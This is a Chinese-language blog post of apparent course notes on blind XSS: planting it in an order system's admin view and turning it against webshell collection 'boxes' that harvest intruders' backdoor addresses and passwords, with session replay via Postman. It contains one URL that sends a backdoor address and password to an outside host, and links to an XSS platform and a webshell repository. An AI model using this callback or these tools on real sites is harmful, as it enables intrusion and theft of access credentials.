0
点赞
收藏
分享

微信扫一扫

WEB漏洞-XSS跨站之订单及Shell箱子反杀记

干自闭 2022-03-12 阅读 70
xssweb安全

思维导图

在这里插入图片描述

xss漏洞存在的地方

留言板 评论区 订单系统 意见反馈等

#cookie session
用户凭据:通过凭据可以判断对方身份信息
cookie 存储本地 存活时间较长 小中型
session 会话 存储服务器 存活时间较短 大型

演示案例:

某营销订单系统 XSS 盲打_平台

前端订单界面

在这里插入图片描述

后端管理界面

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

演示这个案例的意图是:了解在什么位置利用xss,从而获取有用信息!

使用xss平台/工具

自己编写代码接收

某 Shell 箱子系统 XSS 盲打_工具

跨站漏洞可以应用在很多方面

webShell 箱子(后门中的后门) 一句话shell ,脚本后门(大马),脚本控制网站,别有用心的人会在脚本中再写上后面,你入侵一个网站之后,你用他的后门脚本对网站进行一个控制,那么入侵网站的信息,你的后门地址,后门密码,会发送到一个地方,俗称 箱子、信封。

在这里插入图片描述

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XiGfLgiI-1646998304883)(image/QQ截图20220311180354.png)]

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

把你的后门地址和密码传回…

http://www.mumasp.com/xz/sx.asp?u=39.96.44.170/x.asp&p=mumaasp.com

其他参考应用案例-后台权限维持

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

工具 Http/s 数据包提交 Postman 使用

postman软件

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

因为采用的是session验证, 那么xss平台是接收不到PHPSESSION的,

session 是存储在网站服务器的。

涉及资源:

http://xss.fbisb.com/
https://github.com/tennc/webshell
https://www.postman.com/downloads/
https://pan.baidu.com/s/1lIUZvEVXs1du-Bmkt7-abA 提取码:xiao
https://pan.baidu.com/s/13H4N1VTBVwd3t8YWpECBFw 提取码:
xiao

举报

相关推荐

0 条评论